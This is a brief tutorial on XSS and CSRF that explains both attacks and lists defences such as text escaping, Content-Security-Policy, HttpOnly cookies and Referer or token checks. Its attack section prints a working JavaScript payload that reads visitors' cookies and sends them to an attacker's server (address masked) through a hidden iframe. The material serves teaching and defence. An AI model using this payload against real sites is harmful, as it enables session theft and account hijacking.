How to protect against XSS and CSRF attacks

Source: Internet
Author: User


XSS: Cross-site scripting (usually abbreviated XSS) is a security vulnerability in web applications and a form of code injection. It lets an attacker inject script into a web page so that the script runs in the browser of every other user who views that page. The injected content is typically HTML together with client-side script, almost always JavaScript.

CSRF: Cross-site request forgery, also known as a one-click attack or session riding and usually abbreviated CSRF or XSRF, is an attack that makes a user's browser perform an action the user never intended on a web application in which that user is currently logged in.

In simple terms:

XSS works through the client-side scripting language (most commonly JavaScript).
Posting malicious JavaScript in a forum entry is script injection; when that script then executes in other visitors' browsers, for example to send their cookies to a server the attacker controls, it is XSS.

CSRF, also called XSRF, impersonates the user by having their browser send requests without their knowledge, so that operations they never asked for are carried out: posting or deleting content, changing the password or the e-mail address, and so on.

How the attack is carried out

The attacker wraps the following in a <script type="text/javascript"></script> tag and posts it as a comment. Every user who views the comment runs it, and it reports that user's cookies to the attacker's server (the address is elided here) through a hidden iframe:

    (function (window, document) {
        // Build the URL that carries the leaked information
        var cookies = document.cookie;
        var xssUriBase = "http://********";
        var xssUri = xssUriBase + window.encodeURI(cookies);
        // Create a hidden iframe as the exfiltration channel
        var hideFrame = document.createElement("iframe");
        hideFrame.height = 0;
        hideFrame.width = 0;
        hideFrame.style.display = "none";
        hideFrame.src = xssUri;
        // Inserting the frame triggers the request
        document.body.appendChild(hideFrame);
    })(window, document);

How to Protect

Central idea: every piece of data that comes from outside (user input, URL parameters, anything stored from an earlier request) is treated as untrusted. Server-side code must filter or encode it before it is shown on a page; nothing from outside is displayed as-is.

1. Prefer innerText (IE) or textContent (Firefox and other browsers), which is what jQuery's text() wraps, when outputting text. These assign plain text and never parse it as HTML.
2. If you must use innerHTML or a similar function, escape the data first, the way PHP's htmlspecialchars does (& < > " ' become entities).

3. When outputting HTML, send a Content-Security-Policy HTTP header
(purpose: stops the page from loading script from third-party origins, and blocks inline script unless it is explicitly allowed)
(drawback: IE and older browsers do not support it)
4. When setting the session cookie, add the HttpOnly attribute
(purpose: script cannot read the cookie through document.cookie, so a payload like the one above cannot steal it; supported back to IE6)
(drawback: the site's own JavaScript cannot read the cookie either, and the protection is limited to the cookie itself; injected script can still act on the user's behalf from inside the page)
5. When building an API, verify the Referer (or Origin) header of every state-changing request
(purpose: blocks CSRF to a certain extent)
(drawback: in IE and older browsers the Referer could be forged, and some clients omit it entirely; a per-session anti-CSRF token carried in each form is the more reliable check)
